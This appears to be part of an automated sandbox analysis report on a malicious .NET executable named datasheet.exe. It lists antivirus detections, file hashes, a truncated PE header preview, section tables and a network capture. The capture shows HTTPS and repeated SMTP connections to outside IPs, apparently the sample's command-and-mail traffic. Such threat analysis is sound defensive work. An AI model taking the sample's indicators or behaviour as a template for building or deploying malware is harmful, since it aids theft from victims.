                                                          SHA-512:108E542F79D97DCB73490ACD04718A56ADDA3D000E844AD71F0721B3B12D2A06CCB9B28A00E0D2443F2BB5C680617E316CE4A84C98A5E8F4F29ADE1FF9C0BE70
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T................0.................. ... ....@.. .......................`............@.................................u...O.... ..4....................@......8...p............................................ ............... ..H............text........ ...................... ..`.rsrc...4.... ......................@..@.reloc.......@......................@..B........................H.......p>...E..........x....i...........................................0..N........s....}.....s....}.....s....}.....r...p}.....r...p}......}.....(.......(.....*...0..6..............,..{....r!..po.....+.......,..{....rY..po.....*...0............{....r{..po......{.....o.....r...ps...........(....(.....+3..o........4...%..,.o.....s..........{......o.......o ..........-.....,..o!........+...*.........*.X.........*..0..n........s"......o#....+B..($........do%......F.........,...
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.975503153184261
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:datasheet.exe
                                                          File size:651'776 bytes
                                                          MD5:4c7e7bd9eaf56b3936be87a6904f70f8
                                                          SHA1:22591d29813790d622a1d49a1e0bf91b20235cf6
                                                          SHA256:429e0fa9706ee65774188e538bda0b69a15fb93e97864cedb88e33c650ed9538
                                                          SHA512:108e542f79d97dcb73490acd04718a56adda3d000e844ad71f0721b3b12d2a06ccb9b28a00e0d2443f2bb5c680617e316ce4a84c98a5e8f4f29ade1ff9c0be70
                                                          SSDEEP:12288:NyAgFdVoC/HeIMOBkXKxh3IfDj3oSPYzeyu0Lu/bs1D0bWCiYNR/WBS9vD:wAgVoC/HemBNheP3Xg6yTLug0WC7ROB0
                                                          TLSH:7FD4235267B64316E4FC37B4E2B015ED17B46486BC82F2C8EA9235D67F25700B305ABB
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0.................. ... ....@.. .......................`............@................................
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x4a05ca
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0xBAD5FF54 [Tue Apr 30 22:31:48 2069 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                           Name | Virtual Address | Virtual Size | Is in Section
                                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0575 | 0x4f | .text
                                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x634 | .rsrc
                                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa4000 | 0xc | .reloc
                                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9ed38 | 0x70 | .text
                                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                           .text | 0x2000 | 0x9e5d0 | 0x9e600 | ccc481d32b66e333b7e6d75e0ba8a876 | False | 0.979070577644041 | data | 7.981872933279261 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                           .rsrc | 0xa2000 | 0x634 | 0x800 | 6b05a7a25c696b30d8af0c526bad8fa3 | False | 0.33935546875 | data | 3.472330708843389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                           .reloc | 0xa4000 | 0xc | 0x200 | dd9614b762850884a94cb7d0255f9c17 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                           RT_VERSION | 0xa2090 | 0x3a4 | data | | | 0.41952789699570814
                                                           RT_MANIFEST | 0xa2444 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                           DLL | Import
                                                           mscoree.dll | _CorExeMain
                                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                           Nov 21, 2024 09:02:06.158466101 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:06.158504009 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:06.158586979 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:06.166807890 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:06.166829109 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.431925058 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.432044983 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:07.435801029 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:07.435811996 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.436204910 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.509558916 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:07.555340052 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.876435995 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.876604080 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.6
                                                           Nov 21, 2024 09:02:07.876724958 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:07.884093046 CET | 49711 | 443 | 192.168.2.6 | 104.26.13.205
                                                           Nov 21, 2024 09:02:08.828397036 CET | 49714 | 587 | 192.168.2.6 | 77.88.21.158
                                                           Nov 21, 2024 09:02:08.948020935 CET | 587 | 49714 | 77.88.21.158 | 192.168.2.6
                                                           Nov 21, 2024 09:02:08.948120117 CET | 49714 | 587 | 192.168.2.6 | 77.88.21.158
                                                           Nov 21, 2024 09:02:10.243345022 CET | 587 | 49714 | 77.88.21.158 | 192.168.2.6
                                                           Nov 21, 2024 09:02:10.243590117 CET | 49714 | 587 | 192.168.2.6 | 77.88.21.158
                                                           Nov 21, 2024 09:02:10.363106966 CET | 587 | 49714 | 77.88.21.158 | 192.168.2.6
                                                           Nov 21, 2024 09:02:10.639749050 CET | 49716 | 443 | 192.168.2.6 | 104.26.13.205
                                                          Nov 21, 2024 09:02:10.639803886 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:10.640017033 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:10.643841028 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:10.643858910 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:10.691677094 CET5874971477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:10.807663918 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:11.746108055 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:11.899432898 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:11.899602890 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:11.924987078 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:11.925017118 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:11.925326109 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.066591024 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:12.340601921 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:12.383338928 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.689490080 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.689560890 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.689763069 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:12.693764925 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:13.296555042 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:13.416153908 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:13.416249990 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:14.765059948 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:14.802515984 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:14.922126055 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.265408039 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.265916109 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:15.385477066 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.728729010 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.729406118 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:15.849256039 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194008112 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194056034 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194066048 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194077015 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194107056 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.194147110 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.198951006 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.319300890 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.662602901 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.668442011 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.788022995 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.131298065 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.132798910 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:17.252346992 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.595635891 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.618459940 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:17.759133101 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.101485014 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.102026939 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:18.221621037 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.573554993 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.573928118 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:18.693618059 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.132455111 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.132832050 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.252782106 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.595820904 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.599841118 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.599904060 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.600002050 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.600002050 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.719574928 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.719605923 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.719619036 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.719736099 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.358278990 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.407576084 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.506309032 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.626302958 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.969705105 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.969726086 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.969791889 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.970859051 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.973140955 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:21.090601921 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:21.092720985 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:21.092808008 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:22.464337111 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:22.464531898 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:22.584048986 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:22.924563885 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:22.924829006 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.044441938 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.384685040 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.385130882 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.504688978 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847640038 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847657919 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847665071 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847671032 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847769976 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.850119114 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.969657898 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.310590029 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.311980963 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:24.431652069 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.772002935 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.772402048 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:24.891865969 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.232701063 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.233083010 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:25.352571011 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.721448898 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.721807003 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:25.841449022 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.199862003 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.200144053 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:26.320738077 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.771594048 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.771950006 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:26.891499996 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.232161999 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.236428976 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236491919 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236536980 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236573935 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236624956 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236666918 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236702919 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236726046 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236753941 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236773014 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.356188059 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356204987 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356224060 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356234074 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356249094 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356298923 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356441975 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356451035 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356482029 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356492043 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:29.144751072 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:29.188853025 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:44.145246029 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:44.145296097 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.304550886 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.304807901 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.305830956 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.424801111 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:46.424818039 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:46.425822973 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:46.426017046 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:47.723155975 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:47.723365068 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:47.843013048 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.170960903 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.171999931 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:48.330328941 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.619554043 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.621001959 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:48.740773916 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070079088 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070142031 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070162058 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070197105 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070247889 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.070377111 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.073510885 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.193742037 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.521733046 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.555438995 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.675028086 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.003305912 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.003571987 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:50.123985052 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.451447964 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.451812983 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:50.571383953 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.935622931 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.966419935 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:51.085900068 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.425801039 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.428677082 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:51.548588991 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.972928047 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.973164082 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.093024969 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.421019077 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.421489000 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.421574116 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.421648979 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.421699047 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.423192024 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.541217089 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541281939 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541311026 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541311979 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.541338921 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541407108 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542717934 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542793989 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542813063 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542826891 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542851925 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542882919 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542896032 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542927980 CET5874994077.88.21.158192.168.2.6
